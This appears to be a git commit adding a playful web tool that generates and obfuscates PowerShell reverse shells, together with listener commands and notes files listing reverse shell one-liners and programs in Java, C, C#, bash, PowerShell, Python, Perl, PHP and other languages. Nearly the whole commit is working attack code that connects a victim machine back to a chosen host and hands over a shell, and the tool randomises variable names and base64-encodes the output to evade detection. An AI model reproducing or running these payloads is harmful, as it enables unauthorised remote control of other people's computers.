sdrftghrg
This commit is contained in:
2025-04-15 08:21:35 -06:00
parent 7db5046c94
commit fe41bf1dd7
17 changed files with 740 additions and 0 deletions
+6
View File
@@ -0,0 +1,6 @@
notes.txt
scratch.txt
old
dev
*.bak*
*.old*
Binary file not shown.
Binary file not shown.

After

Width:  |  Height:  |  Size: 42 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 172 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 38 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 918 B

Binary file not shown.

After

Width:  |  Height:  |  Size: 2.6 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 15 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 590 KiB

+80
View File
@@ -0,0 +1,80 @@
/*
colors:
* light pink background color: #FFDDDD
* dark purple text color: #6B16A0
* purple (links): #A020F0
* blue (hovers): #0000FF
* nearly white pale pink for text inputs: #FFEEEE
* lighter purple (buttons): #DCA4FF
*/
@font-face {
font-family: ComicCodedRegular;
src: url(ComicCodeRegular.woff)
}
body {
font-family: ComicCodeRegular, "Comic Sans MS", "Comic Sans", monospace;
font-size: 1.1em;
background-color: #FFDDDD;
background-image: url(princesspi-bkg.png);
background-repeat: no-repeat;
color: #6b16a0;
margin-left: 3em;
}
a:link {
color: #A020F0;
}
a:hover {
color: #0000FF;
}
textarea {
font-family: 'Courier New', Courier, monospace;
}
label {
text-decoration: underline;
}
label:focus, label:hover {
text-decoration: none;
}
input[type=text],select,textarea {
border: 2px solid #A020F0;
background-color: #FFEEEE;
}
input[type=text]:focus,select:focus,textarea:focus {
border: 2px solid #0000FF;
}
input[type=button], input[type=submit] {
background-color: #dca4ff;
font-family: ComicCodeRegular, "Comic Sans MS", "Comic Sans", monospace;
}
input[type=button].marginalized {
/*margin-left: 50px;*/
margin-top: 10px;
}
input[type=button]:hover, input[type=submit]:hover, input[type=button]:focus, input[type=submit]:focus {
border: 2px solid #0000FF;
}
.label {
font-weight: bold;
}
.hidden {
display: none;
}
.emphasis {
font-weight: bold;
font-size: 1.2em;
}
+190
View File
@@ -0,0 +1,190 @@
const psOne = '$LHOST = "<host>"; $LPORT = <port>; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()';
const psTwo = 'powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient("<host>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"';
const psThree = 'powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient("<host>", <port>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + "SHELL> ");$StreamWriter.Flush()}WriteToStream "";while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"';
const psFourTLS = "$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('<host>', <port>);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()";
const psRevRaw = [psOne, psTwo, psThree, psFourTLS];
const listenerOne = 'nc -lvnp <port>'; // nc cleartext tcp
const listenerTwo = 'nc -u -lvp <port>'; // nc cleartext udp
const listenerThree = 'sudo ncat -lvnp <port>'; // ncat cleartext tcp
const listenerFour = 'sudo ncat --ssl -lvnp <port>'; // ncat TLS // issues with this so far
const listenerFive = 'sudo openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 30 -nodes; openssl s_server -quiet -key key.pem -cert cert.pem -port <port>' // openssl TLS
const listenerSix = 'sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost 127.0.0.1; set lport <port>; exploit"' // msfconsole (metasploit) TCP // needs testing
const listenerSeven = 'sudo msfconsole -q -x "use multi/handler; set payload windows/x64/meterpreter/reverse_udp; set lhost 127.0.0.1; set lport <port>; exploit"' // msfconsole (metasploit) UDP // needs testing
const listenersRaw = [listenerOne, listenerTwo, listenerThree, listenerFour, listenerFive, listenerSix, listenerSeven];
function revealConfig() {
document.getElementById("advancedConfig").style.display = "block";
}
function showListener() {
document.getElementById("listenerDiv").style.display = "block";
}
function encodeUTF16LE(str) { // props Keveun https://stackoverflow.com/questions/24379446/utf-8-to-utf-16le-javascript
var out, i, len, c;
var char2, char3;
out = "";
len = str.length;
i = 0;
while(i < len) {
c = str.charCodeAt(i++);
switch(c >> 4)
{
case 0: case 1: case 2: case 3: case 4: case 5: case 6: case 7:
// 0xxxxxxx
out += str.charAt(i-1);
break;
case 12: case 13:
// 110x xxxx 10xx xxxx
char2 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x1F) << 6) | (char2 & 0x3F));
out += str.charAt(i-1);
break;
case 14:
// 1110 xxxx 10xx xxxx 10xx xxxx
char2 = str.charCodeAt(i++);
char3 = str.charCodeAt(i++);
out += String.fromCharCode(((c & 0x0F) << 12) | ((char2 & 0x3F) << 6) | ((char3 & 0x3F) << 0));
break;
}
}
var byteArray = new Uint8Array(out.length * 2);
for (var i = 0; i < out.length; i++) {
byteArray[i*2] = out.charCodeAt(i); // & 0xff;
byteArray[i*2+1] = out.charCodeAt(i) >> 8; // & 0xff;
}
return String.fromCharCode.apply( String, byteArray );
}
function genShell() {
const host = document.getElementById("host").value;
const port = document.getElementById("port").value;
const rstype = document.getElementById("rstype").value;
const listenertype = document.getElementById("listenertype").value;
const minLen = document.getElementById("minLen").value;
const maxLen = document.getElementById("maxLen").value;
const psRevStringRaw = psRevRaw[rstype];
encodePS(psRevStringRaw);
}
function randInt(min=2, max=7) {
const minCeil = Math.ceil(min);
const maxFloor = Math.floor(max);
return Math.floor(Math.random() * (maxFloor - minCeil) + minCeil);
}
function randVarname(minLen=2, maxLen=7, charSet='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789') {
let out = '';
const randLen = randInt(minLen, maxLen);
const charsLen = charSet.length;
for (let i=0; i<randLen; i++) {
out += charSet.charAt(Math.floor(Math.random() * charsLen));
}
return '$'+out; // prepend the $ for powersuck
}
function configShell(rawShellString, host, port/*, shell*/) {
let moddedCmdString = rawShellString;
moddedCmdString = moddedCmdString.replaceAll(/<host>/gi, host);
moddedCmdString = moddedCmdString.replaceAll(/<port>/gi, port);
// moddedCmdString = moddedCmdString.replaceAll(/<shell>/gi, shell); // for when we evolve past ps lmao
return moddedCmdString;
}
function encodePS(rawShellString, listenerShow=true) {
const host = document.getElementById("host").value;
const port = document.getElementById("port").value;
const rstype = document.getElementById("listenertype").value;
const minLen = document.getElementById("minLen").value;
const maxLen = document.getElementById("maxLen").value;
let matchies = rawShellString.match(/\$(?!null|zero|false|true)[a-z0-9-_]{2,30}/gi);
const varsLen = matchies.length;
let randVarSubArr = new Array();
let moddedCmdString = configShell(rawShellString, host, port);
for(let i=0; i<varsLen; i++) {
const newRandVar = randVarname(minLen, maxLen);
randVarSubArr.push(newRandVar);
moddedCmdString = moddedCmdString.replaceAll(matchies[i], newRandVar);
}
// for `powershell -e $base64EncodedData` to work, the commands need to be first encoded into Unicode/UTF-16 LE (Windows default) than base64 encoded
const psEncodedlUTF16LE = encodeUTF16LE(moddedCmdString);
const base64EncodedPSExecutable = "powershell -e " + btoa(psEncodedlUTF16LE);
const listener = configShell(listenersRaw[rstype], host, port);
console.log(listenersRaw[rstype]);
document.getElementById("hiddenOutput").innerHTML = base64EncodedPSExecutable;
document.getElementById("hiddenUnencoded").innerHTML = moddedCmdString;
document.getElementById("listener").innerHTML = listener;
document.getElementById("encodedDiv").style.display = "block";
document.getElementById("unencodedDiv").style.display = "block";
if(listenerShow) {
document.getElementById("listenerDiv").style.display = "block";
}
}
function copyCmd(textarea, doneMsg) {
const cmdCopyText = document.getElementById(textarea); // no .value here
cmdCopyText.select(); // select da text
cmdCopyText.setSelectionRange(0, 99999); // mobilefags
navigator.clipboard.writeText(cmdCopyText.value); // copy to clipboard
// flash the "done" message for 500ms
document.getElementById(doneMsg).style.display = "inline";
setTimeout(function() {
document.getElementById(doneMsg).style.display = "none";
document.getSelection().removeAllRanges()
}, 500);
}
function swapMode(mode) {
if(mode == 'revshell') {
document.getElementById('revshellgencontainer').style.display = "block";
document.getElementById('encodepscontainer').style.display = "none";
} else if(mode == 'psencode') {
document.getElementById('encodepscontainer').style.display = "block";
document.getElementById('revshellgencontainer').style.display = "none";
document.getElementById('listenerDiv').style.display = "none";
document.getElementById("unencodedDiv").style.display = "none";
}
document.getElementById('encodedDiv').style.display = "none"; // output div
}
function obsenc(cmd) {
const matchies = cmd.match(/\$[a-zA-z0-9-_]{2,30}[\s;\.]/gi);
console.log(matchies);
}
+1
View File
@@ -0,0 +1 @@
{"name":"","short_name":"","icons":[{"src":"assets/android-chrome-192x192.png","sizes":"192x192","type":"image/png"},{"src":"assets/android-chrome-512x512.png","sizes":"512x512","type":"image/png"}],"theme_color":"#ffffff","background_color":"#ffffff","display":"standalone"}
+64
View File
@@ -0,0 +1,64 @@
java revshells:
```
public class shell {
public static void main(String[] args) {
Process p;
try {
p = Runtime.getRuntime().exec("bash -c $@|bash 0 echo bash -i >& /dev/tcp/<host>>/<port> 0>&1");
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
}
```
```
public class shell {
public static void main(String[] args) {
ProcessBuilder pb = new ProcessBuilder("bash", "-c", "$@| bash -i >& /dev/tcp/<host>/<port> 0>&1")
.redirectErrorStream(true);
try {
Process p = pb.start();
p.waitFor();
p.destroy();
} catch (Exception e) {}
}
}
```
```
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class shell {
public static void main(String[] args) {
String host = "<host>";
int port = <port>;
String cmd = "bash";
try {
Process p = new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s = new Socket(host, port);
InputStream pi = p.getInputStream(), pe = p.getErrorStream(), si = s.getInputStream();
OutputStream po = p.getOutputStream(), so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0)
so.write(pi.read());
while (pe.available() > 0)
so.write(pe.read());
while (si.available() > 0)
po.write(si.read());
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (Exception e) {}
}
p.destroy();
s.close();
} catch (Exception e) {}
}
}
```
+174
View File
@@ -0,0 +1,174 @@
pure C:
```
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = <port>;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("<host>");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"bash", NULL};
execvp("<shell>", argv);
return 0;
}
```
C windows:
```
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")
WSADATA wsaData;
SOCKET Winsock;
struct sockaddr_in hax;
char ip_addr[16] = "<host>";
char port[6] = "<port>";
STARTUPINFO ini_processo;
PROCESS_INFORMATION processo_info;
int main()
{
WSAStartup(MAKEWORD(2, 2), &wsaData);
Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0;
struct hostent *host;
host = gethostbyname(ip_addr);
strcpy_s(ip_addr, 16, inet_ntoa(*((struct in_addr *)host->h_addr)));
hax.sin_family = AF_INET;
hax.sin_port = htons(atoi(port));
hax.sin_addr.s_addr = inet_addr(ip_addr);
WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);
memset(&ini_processo, 0, sizeof(ini_processo));
ini_processo.cb = sizeof(ini_processo);
ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
TCHAR cmd[255] = TEXT("<shell>.exe"); // ?
// TCHAR cmd[255] = TEXT("cmd.exe");
CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);
return 0;
}
```
C#:
```
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;
public static void Main(string[] args)
{
using(TcpClient client = new TcpClient("<host>", <port>))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "<shell>";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
}
```
C#:
```
using System;
using System.Diagnostics;
namespace BackConnect {
class ReverseBash {
public static void Main(string[] args) {
Process proc = new System.Diagnostics.Process();
proc.StartInfo.FileName = "<shell>";
proc.StartInfo.Arguments = "-c \"<shell> -i >& /dev/tcp/<host>>/<port> 0>&1\"";
proc.StartInfo.UseShellExecute = false;
proc.StartInfo.RedirectStandardOutput = true;
proc.Start();
while (!proc.StandardOutput.EndOfStream) {
Console.WriteLine(proc.StandardOutput.ReadLine());
}
}
}
}
```
+5
View File
@@ -0,0 +1,5 @@
https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/
https://www.revshells.com
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
+118
View File
@@ -0,0 +1,118 @@
revshells:
powershell:
Cleartext:
$LHOST = "<host>"; $LPORT = <port>; $TCPClient = New-Object Net.Sockets.TCPClient($LHOST, $LPORT); $NetworkStream = $TCPClient.GetStream(); $StreamReader = New-Object IO.StreamReader($NetworkStream); $StreamWriter = New-Object IO.StreamWriter($NetworkStream); $StreamWriter.AutoFlush = $true; $Buffer = New-Object System.Byte[] 1024; while ($TCPClient.Connected) { while ($NetworkStream.DataAvailable) { $RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length); $Code = ([text.encoding]::UTF8).GetString($Buffer, 0, $RawData -1) }; if ($TCPClient.Connected -and $Code.Length -gt 1) { $Output = try { Invoke-Expression ($Code) 2>&1 } catch { $_ }; $StreamWriter.Write("$Output`n"); $Code = $null } }; $TCPClient.Close(); $NetworkStream.Close(); $StreamReader.Close(); $StreamWriter.Close()
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<host>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('<host>', <port>);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"
C='curl -Ns telnet://<host>:<port>'; $C </dev/null 2>&1 | <shell> 2>&1 | $C >/dev/null
// udp
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|<shell> -i 2>&1|ncat -u <host> <port> >/tmp/f
ncat.exe <host> <port> -e <shell>
ncat <host> <port> -e <shell>
nc -c <shell> <host> <port>
nc <host> <port> -e <shell>
nc.exe <host> <port> -e <shell>
perl -e 'use Socket;$i="<host>";$p=<port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("<shell> -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<host>:<port>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
php -r '$sock=fsockopen("<host>",<port>);exec("<shell> <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<host>",<port>);shell_exec("<shell> <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<host>",<port>);system("<shell> <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<host>",<port>);passthru("<shell> <&3 >&3 2>&3");'
php -r '$sock=fsockopen("<host>",<port>);`<shell> <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("<host>",<port>);popen("<shell> <&3 >&3 2>&3", "r");'
php -r '$sock=fsockopen("<host>",<port>);$proc=proc_open("<shell>", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
TLS: // giving cert error on ncat TLS listener
$sslProtocols = [System.Security.Authentication.SslProtocols]::Tls12; $TCPClient = New-Object Net.Sockets.TCPClient('<host>', <port>);$NetworkStream = $TCPClient.GetStream();$SslStream = New-Object Net.Security.SslStream($NetworkStream,$false,({$true} -as [Net.Security.RemoteCertificateValidationCallback]));$SslStream.AuthenticateAsClient('cloudflare-dns.com',$null,$sslProtocols,$false);if(!$SslStream.IsEncrypted -or !$SslStream.IsSigned) {$SslStream.Close();exit}$StreamWriter = New-Object IO.StreamWriter($SslStream);function WriteToStream ($String) {[byte[]]$script:Buffer = New-Object System.Byte[] 4096 ;$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()};WriteToStream '';while(($BytesRead = $SslStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()
openssl:
mkfifo /tmp/s; <shell> -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <host>:<port> > /tmp/s; rm /tmp/s
*nix:
awk 'BEGIN {s = "/inet/tcp/0/<host>/<port>"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null
zsh -c 'zmodload zsh/net/tcp && ztcp <host> <port> && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
TF=$(mktemp -u);mkfifo $TF && telnet <host> <port> 0<$TF | bash 1>$TF
// udp
<shell> -i >& /dev/udp/<host>/<port> 0>&1
<shell> -i 5<> /dev/tcp/<host>/<port> 0<&5 1>&5 2>&5
exec 5<>/dev/tcp/<host>/<port>;cat <&5 | while read line; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/<host>/<port>; <shell> <&196 >&196 2>&196
<shell> -i >& /dev/tcp/<host>/<port> 0>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|<shell> -i 2>&1|nc <host> <port> >/tmp/f
python:
<shell>: "bash", "powershell", "zsh", "cmd", etc
export RHOST="<host>";export RPORT=<port>;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("<shell>")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<host>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("<shell>")'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<host>",<port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("<port>")'
python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("<host>",<port>));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("<shell>")'
windows:
```
import os,socket,subprocess,threading;
def s2p(s, p):
while True:
data = s.recv(1024)
if len(data) > 0:
p.stdin.write(data)
p.stdin.flush()
def p2s(s, p):
while True:
s.send(p.stdout.read(1))
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("<host>",<port>))
p=subprocess.Popen(["<shell>"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE)
s2p_thread = threading.Thread(target=s2p, args=[s, p])
s2p_thread.daemon = True
s2p_thread.start()
p2s_thread = threading.Thread(target=p2s, args=[s, p])
p2s_thread.daemon = True
p2s_thread.start()
try:
p.wait()
except KeyboardInterrupt:
s.close()
```
Listeners:
ncat TLS:
sudo ncat --ssl -lvnp <port>
+102
View File
@@ -0,0 +1,102 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Princess Pi's Rev Shell Gen! ~ Sillytime! :tbh_bounces:</title>
<link rel="icon" type="image/x-icon" href="assets/favicon.ico">
<link rel="apple-touch-icon" sizes="180x180" href="assets/fapple-touch-icon.png">
<link rel="icon" type="image/png" sizes="32x32" href="assets/ffavicon-32x32.png">
<link rel="icon" type="image/png" sizes="16x16" href="assets/favicon-16x16.png">
<link rel="manifest" href="assets/site.webmanifest">
<link rel="stylesheet" href="assets/silly.css">
</head>
<body>
<h1>Princess Pi's Silly PowerShell Silly!</h1>
<span class="emphasis">Whatchu wanna do~ uwu</span><br>
<label for="revshell">Generate Reverse Shell~</label>
<input type="radio" id="revshell" name="pssilly" onclick="swapMode('revshell')"><br>
<label for="psencode">Encode Custom Powershell~</label>
<input type="radio" id="psencode" name="pssilly" onclick="swapMode('psencode')"><br>
<br><hr><br>
<div id="revshellgencontainer" class="hidden">
<h1>Princess Pi's Rev Shell Gen!</h1>
<label for="host">Host:</label>
<input type="text" value="192.168.1.1" id="host">
<label for="port">Port:</label>
<input type="text" name="port" id="port" value="853" size="7"><br>
<label for="rstype">Type:</label>
<select name="rstype" id="rstype">
<option value="0">PowerShell #0</option>
<option value="1">PowerShell #1</option>
<option value="2">PowerShell #2</option>
<option value="3">PowerShell TLS #3</option>
</select>
<label for="listener">Listener:</label>
<select name="listenertype" id="listenertype">
<option value="0">nc Cleartext TCP</option>
<option value="1">nc Cleartext UDP</option>
<option value="2">ncat Cleartext TCP</option>
<option value="3">ncat TLS</option>
<option value="4">openssl TLS</option>
<option value="5">msfconsole Cleartext TCP</option>
<option value="6">msfconsole Cleartext UDP</option>
</select><br>
<!--
<label for="shell">Shell:</label>
<input type="text" name="shell" value="powershell">
-->
<a href="javascript:revealConfig()">advanced</a><br>
<div class="hidden" id="advancedConfig">
<br>
<span class="emphasis">Advanced Settings:</span><br>
<span class="emphasis">Random Variable Name Lengths:</span><br>
<label for="minLen">Min:</label>
<input type="text" value="2" id="minLen" size="3">
<label for="maxLen">Max:</label>
<input type="text" value="7" id="maxLen" size="3">
<!-- add mangle options here eventually -->
</div>
<input type="button" value="Go, Baby, Go!" onclick="genShell()" class="marginalized"></input>
</div>
<div id="encodepscontainer" class="hidden">
<h1>Encode PowerShell Commands~</h1>
<label for="psInput">PowerShell Code:</label><br>
<textarea rows="10" cols="40" id="psInput"></textarea><br>
<input type="button" value="Go, Encode, Go!" class="marginalized" onclick="encodePS(document.getElementById('psInput').value, false)"><br>
</div>
<div id="encodedDiv" class="hidden">
<br><hr><br>
<label for="hiddenOutput">Encoded:</label><br>
<textarea rows="10" cols="40" id="hiddenOutput"></textarea><br>
<a href="javascript:copyCmd('hiddenOutput', 'copyCmdDone')">Copy to Clipboard</a> <span id="copyCmdDone" class="hidden">Copied!</span>
</div>
<div id="unencodedDiv" class="hidden">
<br>
<label for="hiddenUnencoded">Unencoded:</label><br>
<textarea rows="10" cols="40" id="hiddenUnencoded"></textarea><br>
<a href="javascript:copyCmd('hiddenUnencoded', 'copyCmdUnencoded')">Copy to Clipboard</a> <span id="copyCmdUnencoded" class="hidden">Copied!</span>
</div>
<div id="listenerDiv" class="hidden">
<br>
<label for="listener">Listener:</label><br>
<textarea rows="10" cols="40" id="listener">sudo nc -lvnp 853</textarea><br>
<a href="javascript:copyCmd('listener', 'copyListenerDone')">Copy to Clipboard</a> <span id="copyListenerDone" class="hidden">Copied!</span>
</div>
<script src="assets/silly.js"></script>
</body>
</html>